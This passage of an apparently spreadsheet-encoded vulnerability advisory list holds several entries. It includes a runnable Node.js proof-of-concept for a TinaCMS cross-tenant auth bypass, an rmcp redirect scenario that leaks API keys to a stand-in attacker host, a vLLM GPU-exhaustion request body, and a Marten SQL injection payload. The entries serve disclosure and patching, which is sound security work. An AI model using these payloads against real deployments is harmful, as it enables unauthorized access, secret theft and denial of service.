const IDENTITY_PORT = 18099;
const VICTIM_PORT = 19090;
process.env.IDENTITY_BASE = `http://127.0.0.1:${IDENTITY_PORT}`;
/* ===== verbatim from @tinacms/auth/src/index.ts (types stripped) ===== */
const isUserAuthorized = async (args) =&gt; {
  const clientID = args.clientID;
  const token = args.token;
  try {
    const tinaCloudRes = await fetch(
      `${process.env.IDENTITY_BASE || 'https://identity.tinajs.io'}/v2/apps/${clientID}/currentUser`,
      {
        headers: new Headers({ 'Content-Type': 'application/json', authorization: token }),
        method: 'GET',
      }
    );
    if (tinaCloudRes.ok) {
      const user = await tinaCloudRes.json();
      return user;
    }
    return;
  } catch (e) {
    console.error(e);
    throw e;
  }
};
const isAuthorized = async (req) =&gt; {
  const clientID = req.query.clientID;       // &lt;-- attacker-controlled
  const token = req.headers.authorization;   // &lt;-- attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
/* ===== identity model: a token grants access to the app its owner owns =====
   This is NOT the vulnerable part. It scopes tokens to apps correctly. The bug
   is that the victim lets the caller choose which app to validate against.     */
const TOKEN_FOR = {
  'victim-app': 'valid-token-for-victim-app',
  'attacker-app': 'valid-token-for-attacker-app',
};
const USER_FOR = {
  'victim-app': { id: 'u-victim', email: 'owner@victim.example', verified: true, role: 'admin' },
  'attacker-app': { id: 'u-attacker', email: 'attacker@evil.example', verified: true, role: 'admin' },
};
const identity = http.createServer((req, res) =&gt; {
  const m = req.url.match(/^\/v2\/apps\/([^/]+)\/currentUser$/);
  if (!m) { res.writeHead(404); return res.end('nf'); }
  const app = decodeURIComponent(m[1]);
  if (TOKEN_FOR[app] &amp;&amp; req.headers['authorization'] === TOKEN_FOR[app]) {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify(USER_FOR[app]));
  }
  res.writeHead(401, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ message: 'unauthorized for this app' }));
});
/* ===== victim site (own clientID = victim-app), verbatim media-store README callback ===== */
const authorized = async (req) =&gt; {
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;             // never checks req.query.clientID === victim-app
};
const victim = http.createServer(async (req, res) =&gt; {
  const u = new URL(req.url, `http://127.0.0.1:${VICTIM_PORT}`);
  req.query = Object.fromEntries(u.searchParams.entries());
  if (!u.pathname.startsWith('/api/cloudinary/media')) { res.writeHead(404); return res.end('nf'); }
  if (!(await authorized(req))) {
    res.writeHead(401, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({ message: 'sorry this user is unauthorized' }));
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ authorized: true, site: 'victim-app',
    media: ['victim/private/contract.pdf', 'victim/private/customers.csv'] }));
});
/* ===== driver ===== */
function call(clientID, token) {
  return new Promise((resolve) =&gt; {
    const r = http.request({ host: '127.0.0.1', port: VICTIM_PORT,
      path: `/api/cloudinary/media?clientID=${encodeURIComponent(clientID)}`,
      method: 'GET', headers: { authorization: token } }, (res) =&gt; {
      let b = ''; res.on('data', (c) =&gt; (b += c));
      res.on('end', () =&gt; resolve({ status: res.statusCode, body: b }));
    });
    r.on('error', (e) =&gt; resolve({ status: 0, body: String(e) })); r.end();
  });
}
(async () =&gt; {
  await new Promise((r) =&gt; identity.listen(IDENTITY_PORT, '127.0.0.1', r));
  await new Promise((r) =&gt; victim.listen(VICTIM_PORT, '127.0.0.1', r));
  const c1 = await call('victim-app', 'valid-token-for-victim-app');
  console.log('[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt;', c1.status, c1.body);
  const c2 = await call('victim-app', 'valid-token-for-attacker-app');
  console.log('[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt;', c2.status, c2.body);
  const atk = await call('attacker-app', 'valid-token-for-attacker-app');
  console.log('[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt;', atk.status, atk.body);
  const bug = c1.status === 200 &amp;&amp; c2.status === 401 &amp;&amp; atk.status === 200;
  console.log('\nVERDICT:', bug
    ? 'VULNERABLE — attacker authorized on victim site with credentials only for their own app.'
    : 'NOT REPRODUCED');
  identity.close(); victim.close();
  process.exit(bug ? 0 : 1);
})();
```
Output:
```
[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt; 401 {"message":"sorry this user is unauthorized"}
[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
VERDICT: VULNERABLE - attacker authorized on victim site with credentials only for their own app.
```
CONTROL 1 (200) shows the identity model is faithful, not a blanket allow. CONTROL 2 (401) shows the attacker cannot reach the victim's app with their own token. ATTACK (200) shows that naming their own app id, which their own token matches, passes the victim's gate and returns the victim's private media.
I verified the full chain in source at the audited commit and reproduced the code logic deterministically with the PoC above. I did not run the end-to-end attack against production `identity.tinajs.io` with two real accounts and a live deployment; that step needs two real accounts and a deployment. The one assumption it rests on, that `GET /v2/apps/&lt;attacker-app&gt;/currentUser` with the attacker's own token returns `200` + `verified:true`, is the normal behavior of an app owner's own session.
## Impact
An attacker with a free TinaCloud account reaches editor-level control of unrelated tenants:
- **Media handlers:** list and read media, upload arbitrary objects (`next-tinacms-dos` writes `ACL: public-read`, usable to host malware or phishing under the victim's CDN), and delete media by key.
- **`TinaCloudBackendAuthProvider` backend:** arbitrary GraphQL. Read every document, `createDocument` / `updateDocument` to deface or inject content that deploys to production, and `deleteDocument` to destroy content.
The attacker scripts requests with their own token and `clientID=&lt;own app&gt;` against known TinaCMS self-hosted endpoints, so it scales across deployments.
## Fix
Bind the decision to the site's own configured app id instead of the request value.
```diff
- export const isAuthorized = async (req: NextApiRequest) =&gt; {
-   const clientID = req.query.clientID;
-   const token = req.headers.authorization;
+ export const isAuthorized = async (req: NextApiRequest, expectedClientID?: string) =&gt; {
+   const requestClientID = req.query.clientID;
+   const token = req.headers.authorization;
+   const clientID = expectedClientID ?? process.env.NEXT_PUBLIC_TINA_CLIENT_ID;
+   if (expectedClientID &amp;&amp; requestClientID &amp;&amp; requestClientID !== expectedClientID) {
+     return undefined; // refuse a cross-tenant clientID
+   }
    if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
      return await isUserAuthorized({ clientID, token });
    }
    return undefined;
  };
```
Thread the site's configured `clientID` into `TinaCloudBackendAuthProvider()` and the media handler config, require `isUserAuthorized` to use it rather than `req.query.clientID`, apply the same change to `next-tinacms-azure/src/auth.ts`, and update the media-store READMEs so integrators stop reintroducing the request-driven `clientID`.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64684</t>
        </is>
      </c>
      <c r="D80" s="5" t="inlineStr"/>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="inlineStr"/>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M80" s="5" t="inlineStr">
        <is>
          <t>2.1.0</t>
        </is>
      </c>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr"/>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>## Summary
The `rmcp` crate's `StreamableHttpClientTransport` forwards caller-supplied custom HTTP headers (such as `X-API-Key`, `X-Auth-Token`, `Api-Key`) to cross-origin redirect targets. The `default_http_client()` function builds a `reqwest::Client` without a redirect policy override, so the default `limited(10)` policy follows `307`/`308` redirects and forwards all per-request headers except `Authorization`, `Cookie`, and `Proxy-Authorization`. Custom auth headers injected via `StreamableHttpClientTransportConfig.custom_headers` are not classified as sensitive and are therefore forwarded verbatim to any redirect target — including an attacker-controlled server.
## Affected versions
- Repository: `github.com/modelcontextprotocol/rust-sdk`
- Crate: `rmcp`
- Commit tested: `c330fede90e4729c234f8e87fdbc5ea27a1dd10c` (HEAD, 2026-05-21)
## Vulnerability
**File:** `crates/rmcp/src/transport/common/reqwest/streamable_http_client.rs`
**Root cause 1 — no redirect policy override:**
```rust
// Lines 302-307
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .build()
        .expect("failed to build default reqwest client")
}
```
No `.redirect(reqwest::redirect::Policy::none())` call. The default `limited(10)` policy follows up to 10 redirects and, on cross-origin redirects, strips only `Authorization`, `Cookie`, and `Proxy-Authorization`.
**Root cause 2 — custom headers not sensitivity-marked:**
```rust
// Lines 26-35
fn apply_custom_headers(
    mut builder: reqwest::RequestBuilder,
    custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
) -&gt; Result&lt;reqwest::RequestBuilder, StreamableHttpError&lt;reqwest::Error&gt;&gt; {
    for (name, value) in custom_headers {
        validate_custom_header(&amp;name).map_err(StreamableHttpError::ReservedHeaderConflict)?;
        builder = builder.header(name, value);  // no sensitivity marker
    }
    Ok(builder)
}
```
Headers added via `RequestBuilder::header()` are forwarded to redirect targets because reqwest only strips headers from its own sensitive-header list (`Authorization`, `Cookie`, `Proxy-Authorization`).
**Exposed API:** `StreamableHttpClientTransportConfig.custom_headers` (line 1070), intended for custom auth headers:
```rust
/// Custom HTTP headers to include with every request
pub custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
```
## Attack scenario
1. A caller sets `custom_headers` with an API key for the MCP server:
   ```rust
   let config = StreamableHttpClientTransportConfig::with_uri("https://mcp.example.com/mcp")
       .custom_headers([(HeaderName::from_static("x-api-key"),
                         HeaderValue::from_static("my-secret-key"))].into());
   ```
2. An attacker compromises `mcp.example.com` to return `307 Temporary Redirect` to `https://attacker.example.net/capture`.
3. `rmcp` follows the redirect, forwarding `X-API-Key: my-secret-key` to `attacker.example.net`.
4. The attacker captures the secret and reuses it to call the MCP server directly.
## Negative control
The `auth_header` path (`StreamableHttpClientTransportConfig::auth_header()`) sets the value via `builder.bearer_auth(auth_header)`, which maps to the `Authorization` header — stripped by reqwest on cross-origin redirects. That path is not affected. Only `custom_headers` is vulnerable.
## Fix
In `default_http_client()`, disable automatic redirect following:
```rust
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .redirect(reqwest::redirect::Policy::none())  // &lt;-- add this
        .build()
        .expect("failed to build default reqwest client")
}
```
The transport can then inspect `3xx` responses and decide whether to follow, stripping sensitive headers before doing so. Alternatively, use `reqwest::ClientBuilder::connection_verbose` or per-request `Request::headers_mut()` to remove auth headers before the redirect is followed.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64684</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69147</t>
        </is>
      </c>
      <c r="D81" s="5" t="inlineStr"/>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M81" s="5" t="inlineStr">
        <is>
          <t>0.28.0</t>
        </is>
      </c>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr"/>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>## Summary
Current vLLM `main` lets an inference request choose the PyNvVideoCodec GPU video decoder through `media_io_kwargs.video.video_backend`, but engine GPU memory reservation is computed only from static startup configuration and `VLLM_VIDEO_LOADER_BACKEND`. If the server starts with the default OpenCV/software backend and no `--mm-ipc-gpu-memory-gb` budget, a client can still route a video request into the PyNvVideoCodec path after startup, causing frontend CUDA-context, decoder-surface, and decoded-frame GPU allocations that were not carved out of the engine KV-cache budget.
## Technical Details
The vulnerable boundary is the split between request-time media decoding choices in the API server and startup-time memory budgeting in the engine worker. Request bodies for Chat Completions and Responses expose `media_io_kwargs`, and those values are forwarded to the shared media connector. For video inputs, `MediaConnector.fetch_video()` copies `self.media_io_kwargs["video"]` into `video_io_kwargs`, only setting a model-derived backend when `video_backend` is absent. `VideoMediaIO.__init__()` then consumes `video_backend` from those kwargs and loads that backend from `VIDEO_LOADER_REGISTRY`.
The relevant request-side source path is:
```python
video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))
if "video_backend" not in video_io_kwargs and (
    video_backend := get_video_loader_backend_for_processor(video_processor)
):
    video_io_kwargs["video_backend"] = video_backend
video_io = VideoMediaIO(image_io, **video_io_kwargs)
```
```python
video_loader_backend = (
    kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND
)
self.video_loader = VIDEO_LOADER_REGISTRY.load(video_loader_backend)
```
`VideoBackend.load_bytes()` then dispatches `backend == "pynvvideocodec"` into `decode_frames_pynvvideocodec()`, which constructs a PyNvVideoCodec decoder, creates or uses a CUDA stream, reads stream metadata, decodes selected frames on the GPU, and copies those frames into pinned host memory. The new frontend GPU memory pool accounts only for raw decoded frame bytes when a pool exists; it does not make request-time backend selection safe when no startup reservation was made.
The engine-side reservation code makes its decision from static model config and environment only:
```python
def _uses_pynvvideocodec_video_backend(mm_config) -&gt; bool:
    video_kwargs = mm_config.media_io_kwargs.get("video", {})
    video_loader_backend = (
        video_kwargs.get("video_backend") or envs.VLLM_VIDEO_LOADER_BACKEND
    )
    codec_backend = video_kwargs.get("backend")
    return (
        video_loader_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
        or codec_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
    )
```
```python
decoder_reserved_bytes = (
    num_api_servers * per_server_decoder_bytes
    if self._uses_pynvvideocodec_video_backend(mm_config)
    else 0
)
reserved_bytes = raw_frame_reserved_bytes + decoder_reserved_bytes
if reserved_bytes &lt;= 0:
    return available_kv_cache_memory_bytes
```
With default static video configuration, `mm_config.media_io_kwargs["video"]` does not name PyNvVideoCodec and `VLLM_VIDEO_LOADER_BACKEND` defaults to OpenCV/software decoding. The worker therefore reserves no PyNv decoder/CUDA-context bytes. A later request can still set `media_io_kwargs.video.video_backend="pynvvideocodec"` and reach the GPU decoder path because that runtime field is intentionally honored by `VideoMediaIO`.
## PoV
An ordinary multimodal inference request can carry the backend override in the request body:
```json
{
  "model": "served-vlm",
  "messages": [
    {
      "role": "user",
      "content": [
        {"type": "text", "text": "summarize this clip"},
        {"type": "video_url", "video_url": {"url": "data:video/mp4;base64,&lt;small-mp4&gt;"}}
      ]
    }
  ],
  "media_io_kwargs": {
    "video": {
      "video_backend": "pynvvideocodec"
    }
  }
}
```
The following bounded source-level check confirms the code path without allocating GPU memory:
```bash
git clone --filter=blob:none https://github.com/vllm-project/vllm.git
cd vllm
git checkout ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a
python3 check_pynv_backend_reservation.py --repo .
```
## PoC
The bounded check validates current source markers, simulates the exact static reservation predicate, and compares vulnerable and negative-control configurations. Key output:
```json
{
  "vulnerable": true,
  "head": "ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a",
  "reservation_simulation": {
    "env_video_loader_backend": "opencv",
    "request_selects_pynv_after_startup": true,
    "vulnerable_static_reserved_bytes": 0,
    "negative_control_static_pynv_reserved_bytes": 2066953011,
    "raw_frame_only_control_reserved_bytes": 268435456,
    "unreserved_decoder_bytes_when_only_request_selects_pynv": 2066953011
  }
}
```
The negative control is important: when PyNvVideoCodec is selected statically, the worker reserves `2066953011` bytes per API process for decoder surfaces plus CUDA context. The vulnerable case reserves `0` bytes for the same decoder overhead because PyNvVideoCodec is selected only by the later request. A second control with static OpenCV plus `mm_ipc_gpu_memory_gb=0.25` reserves only the raw-frame semaphore budget and still does not reserve PyNv decoder/CUDA-context bytes.
## Impact
An attacker who can submit video requests to a vLLM deployment with PyNvVideoCodec available can force frontend GPU decoding even when the engine did not reserve memory for that decoder during startup. On high-utilization serving deployments, the unreserved CUDA context, retained decoder surfaces, and decoded-frame allocations can reduce or exhaust GPU memory that the engine assumed was available for weights, activations, or KV cache, causing request failures, worker crashes, or service-level denial of service.
Suggested severity is Medium with conservative CVSS v3.1 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5). If a deployment exposes the affected API without authentication, `PR:N` would raise the deployment-specific score. Suggested weaknesses are `CWE-770` (Allocation of Resources Without Limits or Throttling) and `CWE-400` (Uncontrolled Resource Consumption). This should not be rated Low because the affected resource is shared GPU memory in the serving path and the code already treats the PyNv decoder/CUDA-context footprint as large enough to reserve at startup when statically configured.
Limitations: exploitation requires a GPU deployment where PyNvVideoCodec is installed and usable, and the request must reach a video-capable model/path. The issue does not claim code execution, data disclosure, or SSRF.
## Suggested Fix
Do not allow untrusted request fields to select a GPU decoder that was not included in startup memory reservation. The simplest fix is to reject request-level `media_io_kwargs.video.video_backend="pynvvideocodec"` unless the static server configuration already selected PyNvVideoCodec and reserved its decoder/CUDA-context budget.
If dynamic backend selection remains supported, split software and GPU decoder policies: allow request selection among CPU/software decoders only, require an explicit operator allowlist for GPU decoders, and include every request-selectable GPU decoder in the startup reservation predicate. Add regression coverage for static OpenCV startup config plus request-level PyNvVideoCodec override, and preserve the negative control where static PyNvVideoCodec configuration reserves decoder/CUDA-context bytes.
## Affected Package/Versions
Package: `vllm` from `vllm-project/vllm`.
Confirmed affected: current `main` at `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a`.
Introduced by: `af16446bf39de047ab57649c933063cf1cbf1e50`, `Vram semaphore infra (#44465)`, committed 2026-06-26T17:32:51-07:00.
Release status checked: `git tag --contains af16446bf` returned no release tags in the fresh checkout. GitHub repository metadata reported latest published release `v0.23.0` published 2026-06-15T05:27:20Z; the local `v0.24.0` tag also does not contain the introducing commit. The affected range should therefore be current `main` builds containing `af16446bf` until fixed, rather than a confirmed released-version range.
## Advisory History
Public vLLM advisories checked included audio decompression-bomb DoS, unbounded `video/jpeg` frame-count DoS, MediaConnector SSRF, video processing RCE, multimodal embedding DoS/RCE, GGUF GPU memory exposure, multimodal hashing, and other request-parameter DoS classes. None matched request-selected PyNvVideoCodec or the static VRAM reservation mismatch.
Prior local/private vLLM report families checked included request-level `media_io_kwargs` reopening `video/jpeg` frame fanout, GLM video metadata amplification, and audio media decode duration-limit bypass. Those reports share the request-level media kwargs boundary, but they target CPU/media decode limits or model metadata amplification. This report targets a different privileged asset and fix surface: GPU decoder selection after engine startup memory reservation.
Focused GitHub issue/PR searches for `pynvvideocodec`, `mm_ipc_gpu_memory`, `video_backend media_io_kwargs`, `Vram semaphore infra`, and `frontend multimodal GPU decoding` found the PyNvVideoCodec zero-copy RFC, an old do-not-review prototype, merged PR `#44465`, and an unrelated TorchCodec backend PR. No public issue or PR described this security boundary.
## Appendix: Bounded Source-Level Check
```python
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import json
import re
import subprocess
from pathlib import Path
MIB = 1024 * 1024
GIB = 1024 * MIB
def read(repo: Path, rel: str) -&gt; str:
    return (repo / rel).read_text(encoding="utf-8")
def const_int(source: str, name: str) -&gt; int:
    expr = re.search(rf"^{name}\s*=\s*(.+)$", source, flags=re.MULTILINE).group(1).strip()
    if expr == "128 * MiB_bytes":
        return 128 * MIB
    if expr == "int(1.8 * 1024 * MiB_bytes)":
        return int(1.8 * 1024 * MIB)
    if expr == "1":
        return 1
    raise AssertionError(expr)
def uses_pynv_static(static_media_io_kwargs: dict[str, dict[str, str]], env_backend: str) -&gt; bool:
    video_kwargs = static_media_io_kwargs.get("video", {})
    video_loader_backend = video_kwargs.get("video_backend") or env_backend
    codec_backend = video_kwargs.get("backend")
    return video_loader_backend == "pynvvideocodec" or codec_backend == "pynvvideocodec"
def reserve_bytes(static_media_io_kwargs, env_backend, mm_ipc_gpu_memory_gb, decoder_bytes, cuda_context_bytes, retained_decoders):
    raw_frame_reserved_bytes = int(mm_ipc_gpu_memory_gb * GIB)
    per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
    decoder_reserved_bytes = per_server_decoder_bytes if uses_pynv_static(static_media_io_kwargs, env_backend) else 0
    return raw_frame_reserved_bytes + decoder_reserved_bytes
parser = argparse.ArgumentParser()
parser.add_argument("--repo", required=True, type=Path)
repo = parser.parse_args().repo.resolve()
media_video = read(repo, "vllm/multimodal/media/video.py")
connector = read(repo, "vllm/multimodal/media/connector.py")
chat_protocol = read(repo, "vllm/entrypoints/openai/chat_completion/protocol.py")
responses_protocol = read(repo, "vllm/entrypoints/openai/responses/protocol.py")
gpu_worker = read(repo, "vllm/v1/worker/gpu_worker.py")
video_core = read(repo, "vllm/multimodal/video.py")
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in chat_protocol
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in responses_protocol
assert 'video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))' in connector
assert 'if "video_backend" not in video_io_kwargs and (' in connector
assert 'kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND' in media_video
assert "elif backend == PYNVVIDEOCODEC_VIDEO_BACKEND:" in video_core
assert 'video_kwargs = mm_config.media_io_kwargs.get("video", {})' in gpu_worker
decoder_bytes = const_int(video_core, "PYNVVIDEOCODEC_DECODER_GPU_MEMORY_BYTES")
retained_decoders = const_int(video_core, "PYNVVIDEOCODEC_MAX_RETAINED_DECODERS")
cuda_context_bytes = const_int(video_core, "PYNVVIDEOCODEC_CUDA_CONTEXT_BYTES")
per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
vulnerable_static_reserved = reserve_bytes({}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
negative_control_reserved = reserve_bytes({"video": {"video_backend": "pynvvideocodec"}}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
raw_frame_only_control = reserve_bytes({}, "opencv", 0.25, decoder_bytes, cuda_context_bytes, retained_decoders)
head = subprocess.check_output(["git", "-C", str(repo), "rev-parse", "HEAD"], text=True).strip()
print(json.dumps({
    "head": head,
    "vulnerable": vulnerable_static_reserved == 0 and negative_control_reserved == per_server_decoder_bytes,
    "reservation_simulation": {
        "env_video_loader_backend": "opencv",
        "request_selects_pynv_after_startup": True,
        "vulnerable_static_reserved_bytes": vulnerable_static_reserved,
        "negative_control_static_pynv_reserved_bytes": negative_control_reserved,
        "raw_frame_only_control_reserved_bytes": raw_frame_only_control,
        "unreserved_decoder_bytes_when_only_request_selects_pynv": per_server_decoder_bytes,
    },
}, indent=2, sort_keys=True))
```</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69147</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D82" s="5" t="inlineStr"/>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>nuget:Marten</t>
        </is>
      </c>
      <c r="M82" s="5" t="inlineStr">
        <is>
          <t>9.13.0</t>
        </is>
      </c>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr"/>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>Several code paths in Marten's LINQ provider and tenant-management internals interpolated a runtime, potentially attacker-influenced value into generated SQL as a single-quoted string literal without escaping or parameterization. A value containing a single quote (`'`) could break out of the literal and inject arbitrary SQL.
The primary vector is a `Dictionary&lt;,&gt;` indexer **key** used in a `Where` filter — `Where(x =&gt; x.Attributes[key] == v)` — a common "filter by attribute name" / EAV pattern. It is confirmed with an executed proof-of-concept and yields filter / multi-tenant authorization bypass (returning other tenants' rows) and blind data exfiltration. Where the application permits `;`-batched statements (Npgsql default), data modification is also possible.
## Affected sinks
- `Linq/Members/Dictionaries/DictionaryItemMember.cs` — dictionary indexer key (primary, confirmed PoC)
- `Linq/Members/Dictionaries/DictionaryContainsKeyFilter.cs` — `Dictionary.ContainsKey(key)` (Newtonsoft serializer only; System.Text.Json escapes the quote)
- `Linq/Parsing/SelectParser.cs` — a constant string projected through `Select(x =&gt; new { L = runtimeString })`
- `Internal/Operations/DeleteAllForTenant.cs` — tenant id reaching per-tenant projection teardown via `IEventStore.DeleteProjectionProgressAsync` (an in-code comment wrongly claimed the value was validated)
- `Schema/DatabaseScopedTenantPartitions.cs` — tenant id inlined into `FOR VALUES IN ('...')` partition DDL
- `Events/Daemon/Internals/EventLoader.cs` (defense-in-depth) — per-tenant partition-pruning literal
## Proof of concept (primary vector)
Benign: `x.Attributes["nonexistent-key"] == "v"` returns 0 rows. Attack: `x.Attributes["nonexistent' = '' or 1=1 --"] == "v"` returns all rows. Generated SQL:
```
select d.data from public.mt_doc_doc as d where d.data -&gt; 'Attributes' -&gt;&gt; 'x' or 1=1 --' = :p0;
```
## Fix
Each sink now escapes embedded single quotes (`.Replace("'", "''")`, mirroring the existing `Ordering.BuildNgramRankExpression`) or binds the value as a parameter (`DeleteAllForTenant`). Where a literal is retained for partition pruning, escaping preserves plan-time pruning while closing the injection. Regression tests lock down each vector.
## Workarounds
Until upgrading: do not pass untrusted input as a dictionary indexer key / `ContainsKey` argument / `Select` constant, nor as a tenant id into projection teardown or provisioning; and disable multi-statement command batching to limit blast radius.
## Credit
Reported privately and responsibly by an external security researcher with an executed PoC. Additional sinks found during the follow-up LINQ-wide audit.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D83" s="5" t="inlineStr"/>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>pip:RestrictedPython</t>
        </is>
      </c>
      <c r="M83" s="5" t="inlineStr">
        <is>
          <t>8.4</t>
        </is>
      </c>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr"/>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>### Impact
RestrictedPython could allow a sandbox escape when a policy exposes the standard library `string` module, or otherwise exposes `string.Formatter`, to restricted code.
